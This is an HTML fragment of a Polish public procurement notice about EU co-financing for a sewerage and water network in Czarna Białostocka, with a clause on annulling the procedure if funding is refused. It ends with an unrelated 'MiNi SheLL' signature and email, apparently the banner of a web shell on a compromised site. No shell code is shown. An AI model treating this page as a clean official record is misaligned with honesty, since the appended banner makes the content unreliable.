<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja objęta nadzorem inwestorskim jest współfinansowana ze środków Unii Europejskiej w ramach projektu pn. Budowa systemu kanalizacji sanitarnej i sieci wodociągowej w aglomeracji Czarna Białostocka z Regionalnego Programu Operacyjnego Województwa Podlaskiego 2007-2013: Oś priorytetowa V: Rozwój infrastruktury ochrony środowiska, Działanie V.1 Rozwój regionalny infrastruktury ochrony środowiska.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com